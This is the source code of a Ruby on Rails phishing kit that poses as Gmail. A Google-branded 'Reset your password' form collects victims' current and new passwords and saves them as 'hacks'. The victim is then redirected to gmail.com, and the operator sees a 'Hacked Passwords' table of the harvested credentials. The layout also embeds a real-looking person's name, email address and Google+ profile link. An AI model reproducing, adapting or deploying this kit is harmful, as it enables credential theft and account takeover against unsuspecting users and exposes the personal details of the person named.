config/routes.rb
Rails.application.routes.draw do
  resources :emails

  resources :hacks
  # For details on the DSL available within this file, see http://guides.rubyonrails.org/routing.html
  root 'hacks#new'
  get 'hacks/index'
end

app/models/application_record.rb
class ApplicationRecord < ActiveRecord::Base
  self.abstract_class = true
end

app/models/email.rb
class Email < ApplicationRecord

end

app/models/hack.rb
class Hack < ApplicationRecord
validates_presence_of :New_password,:Confirm_new_password,:Current_password

end

app/controllers/application_controller.rb
class ApplicationController < ActionController::Base
  protect_from_forgery with: :exception



end

app/controllers/emails_controller.rb
class EmailsController < ApplicationController
  before_action :set_email, only: [:show, :edit, :update, :destroy]

  # GET /emails
  # GET /emails.json
  def index
    @emails = Email.all
  end

  # GET /emails/1
  # GET /emails/1.json
  def show
  end

  # GET /emails/new
  def new
    @email = Email.new
  end

  # GET /emails/1/edit
  def edit
  end

  # POST /emails
  # POST /emails.json
  def create
    @email = Email.new(email_params)

    respond_to do |format|
      if @email.save
        format.html { redirect_to new_hack_path, notice: 'Email was successfully created.' }

      else
        format.html { render :new }
        format.json { render json: @email.errors, status: :unprocessable_entity }
      end
    end
  end

  # PATCH/PUT /emails/1
  # PATCH/PUT /emails/1.json
  def update
    respond_to do |format|
      if @email.update(email_params)
        format.html { redirect_to @email, notice: 'Email was successfully updated.' }
        format.json { render :show, status: :ok, location: @email }
      else
        format.html { render :edit }
        format.json { render json: @email.errors, status: :unprocessable_entity }
      end
    end
  end

  # DELETE /emails/1
  # DELETE /emails/1.json
  def destroy
    @email.destroy
    respond_to do |format|
      format.html { redirect_to emails_url, notice: 'Email was successfully destroyed.' }
      format.json { head :no_content }
    end
  end

  private
    # Use callbacks to share common setup or constraints between actions.
    def set_email
      @email = Email.find(params[:id])
    end

    # Never trust parameters from the scary internet, only allow the white list through.
    def email_params
      params.require(:email).permit(:mailid)
    end
end

app/controllers/hacks_controller.rb
class HacksController < ApplicationController
  before_action :set_hack, only: [:show, :edit, :update, :destroy]

  # GET /hacks
  # GET /hacks.json
  def index
    @hacks = Hack.all
  end

  # GET /hacks/1
  # GET /hacks/1.json
  def show

    redirect_to "http://www.gmail.com",notice: 'Password successfully changed'
  end

  # GET /hacks/new
  def new
    @hack = Hack.new
  end

  # GET /hacks/1/edit
  def edit
  end

  # POST /hacks
  # POST /hacks.json
  def create
    @hack = Hack.new(hack_params)

    respond_to do |format|
      if @hack.save
        format.html { redirect_to @hack, notice: 'Hacked password received successfully.' }
        format.json { render :show, status: :created, location: @hack }
      else
        format.html { render :new }
        format.json { render json: @hack.errors, status: :unprocessable_entity }
      end
    end
  end

  # PATCH/PUT /hacks/1
  # PATCH/PUT /hacks/1.json
  def update
    respond_to do |format|
      if @hack.update(hack_params)
        format.html { redirect_to @hack, notice: 'Hacked password successfully updated.' }
        format.json { render :show, status: :ok, location: @hack }
      else
        format.html { render :edit }
        format.json { render json: @hack.errors, status: :unprocessable_entity }
      end
    end
  end

  # DELETE /hacks/1
  # DELETE /hacks/1.json
  def destroy
    @hack.destroy
    respond_to do |format|
      format.html { redirect_to hacks_url, notice: 'Hacked password successfully removed.' }
      format.json { head :no_content }
    end
  end

  private
    # Use callbacks to share common setup or constraints between actions.
    def set_hack
      @hack = Hack.find(params[:id])
    end

    # Never trust parameters from the scary internet, only allow the white list through.
    def hack_params
      params.require(:hack).permit(:Current_password, :New_password, :Confirm_new_password)
    end
end

app/helpers/application_helper.rb
module ApplicationHelper

  def bootstrap_class_for flash_type
    { success: "alert-success", error: "alert-danger", alert: "alert-warning", notice: "alert-info" }[flash_type] || flash_type.to_s
  end

  def flash_messages(opts = {})
    flash.each do |msg_type, message|
      concat(content_tag(:div, message, class: "alert #{bootstrap_class_for(msg_type)} fade in") do
        concat content_tag(:button, 'x', class: "close", data: { dismiss: 'alert' })
        concat message
      end)
    end
    nil
  end
end

app/helpers/emails_helper.rb
module EmailsHelper
end

app/helpers/hacks_helper.rb
module HacksHelper
end

app/views/hacks/_form.html.erb
<ul><table><h3 style="color: red"><br><ul><ul>Reset your password</ul></ul></h3>

  <td width="700cm" style="vertical-align: top;">
    <br><ul><ul><h5>Enter a new passwordfor your account. We highly <br>recommend you to create a unique password
     - one that you<br>don't use for any other websites.<br><br><br>
    Note: You can't reuse your old password once you change<br>it.<br><br><br>
    <a href="https://support.google.com/accounts/answer/32040?visit_id=1-636231973722864833-269686299&p=pw_dont_reuse&hl=en-GB&rd=1">Learn more about choosing a smart password</a>
    <br><br>
  </h5></ul></ul></td>

    <div style="float: right">
  <ul>
  <td>
    <%= bootstrap_form_for(@hack) do |f| %>


        <span class="list-group-item" style="width: 10cm;height: 12.5cm;background-color: #EFEFEF" >
          <br>
    <div class="field">
      <%#= f.label :Current_password  %>
      <%= f.password_field :Current_password, :class=>"form-control" ,:id=>"exampleInputPassword1"%>
    </div>
    <div class="field">
      <a href="https://accounts.google.com/signin/usernamerecovery?continue=https%3A%2F%2Fmail.google.com%2Fmail%2F&service=mail&ss=1&scc=1&rm=false&osid=1&hl=en-GB">Don't know your password?</a>
    </div>
<br>

  <div class="field">
    <%#= f.label :New_password %>
    <%= f.password_field :New_password ,:id=>"password",:oninput=>"c()",:class=>"form-control" %>
    <% if @minimum_password_length %>
       <em style="color: red" id = 'pass4' ></em> <em style="color: green" id = 'pass5'></em>
    <% end %><br />
  </div>

<br>
  <div class="field">
    <%#= f.label :Confirm_new_password %>
    <%= f.password_field :Confirm_new_password, :class=>"form-control" ,:oninput=>"check()",:id=>"password_confirmation" %>
    <em style="color: red" id = 'pass2' ></em>   <em style="color: green" id = 'pass3'></em>
  </div>

<br><br>
  <div class="actions">
    <%= f.button 'Change Password',class: "btn btn-primary",autocomplete: "off"%>
    <%= button_tag 'Cancel',class: "btn btn-default",url:'google.com'  %>
  </div>
</span>
<% end %>
    </ul> </div></table></ul>


<%# *************************************Script here********************************* %>
<script language='javascript' type='text/javascript'>
  function check() {
    var pass2= document.getElementById("pass2");
    var pass3= document.getElementById("pass3");
    var pass= document.getElementById("password").value;
    var pass1= document.getElementById("password_confirmation").value;
    if (pass == pass1) {
      pass2.style.display='none';
      pass3.style.display='';
      pass3.innerHTML = 'Password matches';
    }
    else {
      // input is valid -- reset the error message
      pass3.style.display='none';
      pass2.style.display='';
      pass2.innerHTML = 'Password does not matches';
    }

  }

</script>
<script language='javascript' type='text/javascript'>
  function c() {
    var pass5= document.getElementById("pass5");
    var pass4= document.getElementById("pass4");
    var pass= document.getElementById("password").value;
    var j= document.getElementById("password_confirmation");
    if (pass.length < 6) {
      pass5.style.display='none';
      pass4.style.display='';
      pass4.innerHTML = 'Password should not be less than 6 characters';
      j.disabled = true;
    }
    else {
      // input is valid -- reset the error message
      pass4.style.display='none';
      pass5.style.display='';
      pass5.innerHTML = 'Your password length is ok now';
      j.disabled = false;
    }

  }

</script>

app/views/hacks/edit.html.erb
<h1>Editing Hack</h1>

<%= render 'form', hack: @hack %>

<%= link_to 'Show', @hack %> |
<%= link_to 'Back', hacks_path %>

app/views/hacks/index.html.erb
<p id="notice"><%= notice %></p>



<table align="center">
  <thead>
  <tr>
  <td style="border: groove;width: 6cm;background-color: forestgreen;color: black" align="center" colspan="5"><h1 align="center">Hacked Passwords</h1></td>
  </tr>
  <tr style="border: groove">

      <td style="border: groove;width: 6cm;height: 1cm;background-color: forestgreen;color: white" align="center">Current password</td>
      <td style="border: groove;width: 6cm;height: 1cm;background-color: forestgreen;color: white" align="center">New password</td>
      <td style="border: groove;width: 6cm;height: 1cm;background-color: forestgreen;color: white" align="center">Confirm new password</td>
      <td style="border: groove;width: 6cm;height: 1cm;background-color: forestgreen;color: white" align="center">Received at</td>
      <td style="border: groove;width: 6cm;height: 1cm;background-color: forestgreen;color: white" align="center">Delete</td>
    </tr>
  </thead>

  <tbody>
    <% @hacks.each do |hack| %>
      <tr>
        <td style="border: groove;width: 6cm;height: 0.5cm" align="center" ><%= hack.Current_password %></td>
        <td style="border: groove;width: 6cm;height: 0.5cm" align="center"><%= hack.New_password %></td>
        <td style="border: groove;width: 6cm;height: 0.5cm" align="center"><%= hack.Confirm_new_password %></td>
        <td style="border: groove;width: 6.5cm;height: 0.5cm" align="center">Date: <%=hack.created_at.strftime("%d %b. %Y")%>, Time: <%= hack.created_at.strftime("%I:%M %p")%></td>
        <td style="border: groove;width: 6cm;height: 0.5cm" align="center"><%= link_to 'Delete',hack,method: :delete,class: "btn btn-success btn-block" , data: { confirm: 'Are you sure?' } %></td>
      </tr>
    <% end %>
  </tbody>
</table>

<br>

app/views/hacks/new.html.erb
<%= render 'form', hack: @hack %>

app/views/hacks/show.html.erb
<p id="notice"><%= notice %></p>

<p>
  <strong>Current password:</strong>
  <%= @hack.Current_password %>
</p>

<p>
  <strong>New password:</strong>
  <%= @hack.New_password %>
</p>

<p>
  <strong>Confirm new password:</strong>
  <%= @hack.Confirm_new_password %>
</p>

<%= link_to 'Edit', edit_hack_path(@hack) %> |
<%= link_to 'Back', hacks_path %>

app/views/layouts/application.html.erb
<!DOCTYPE html>
<html>
  <head>
    <title>Gmail</title>
    <%= csrf_meta_tags %>

    <%= stylesheet_link_tag    'application', media: 'all', 'data-turbolinks-track': 'reload' %>
    <%= javascript_include_tag 'application', 'data-turbolinks-track': 'reload' %>
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
  </head>

  <body>

  <div class="container">
    <div class="row">
      <div class="col-md-12">
        <div class="navbar-wrapper">
          <div class="container">
            <div class="navbar navbar-default navbar-fixed-top" role="navigation" style="height: 1.9cm">
              <br>
              <div class="container">
                <div class="navbar-header">
                  <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
                    <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span><span
                  class="icon-bar"></span><span class="icon-bar"></span>
                  </button>
                  <img src="http://www.google.co.th/images/branding/googlelogo/1x/googlelogo_color_116x41dp.png" width="110cm">

                </div>
                <div class="navbar-collapse collapse">

                  <ul class="nav navbar-nav navbar-right">
                    <li class="dropdown"><img id="profile-img" class="dropdown-toggle"  src="http://oi66.tinypic.com/2u8exsg.jpg" data-toggle="dropdown" align="right"/>
                      </a>
                      <ul class="dropdown-menu">
                        <li>
                          <div class="navbar-content">
                            <div class="row">
                              <div class="col-md-5">
                                <img src="http://oi66.tinypic.com/2u8exsg.jpg"
                                     alt="Alternate Text" class="img-responsive" />
                                <p class="text-center small">
                                  <a href="#">Change Photo</a></p>
                              </div>
                              <div class="col-md-7">
                                <span><b>Lalitha Sahasra</b></span>
                                <p class="text-muted small">
                                  lallisahi95@gmail.com</p>
                                <p class="text-muted small">
                                  <a href="https://plus.google.com/u/0/100685364471627702947">Google+&nbsp;&nbsp;Profile</a>&nbsp; - &nbsp;<a href="http://www.google.co.th/intl/en/policies/privacy/">Privacy</a></p>
                                <div class="divider">
                                </div>
                                <a href="#" class="btn btn-primary btn-sm active">View Profile</a>
                              </div>
                            </div>
                          </div>
                          <div class="navbar-footer">
                            <div class="navbar-footer-content">
                              <div class="row">
                                <div class="col-md-6">
                                  <a href="https://accounts.google.com/AddSession?hl=en-GB&continue=https://mail.google.com/mail&service=mail" class="btn btn-default btn-sm">Add account</a>
                                </div>
                                <div class="col-md-6">
                                  <a href="https://www.google.co.th/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=0ahUKEwi3gsORlqPSAhUBPo8KHZCBCYgQFggaMAA&url=https%3A%2F%2Faccounts.google.com%2Flogout&usg=AFQjCNG-5gEOpmoxS7tNVumwlq2X5JDVJw" class="btn btn-default btn-sm pull-right">Sign Out</a>
                                </div>
                              </div>
                            </div>
                          </div>
                        </li>
                      </ul>
                    </li>
                  </ul>

                  <ul class="nav navbar-nav navbar-right">
                    <li><a class="glyphicon  glyphicon-bell" style="color: #2E2F30" >&nbsp;&nbsp;</a></li>
                  </ul>
                  <ul class="nav navbar-nav navbar-right">
                    <li><a class="glyphicon glyphicon-th" style="color: #2E2F30" > </a></li>
                  </ul>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
  </body>
  <br><br><br><br>
  <%= yield %>
</html>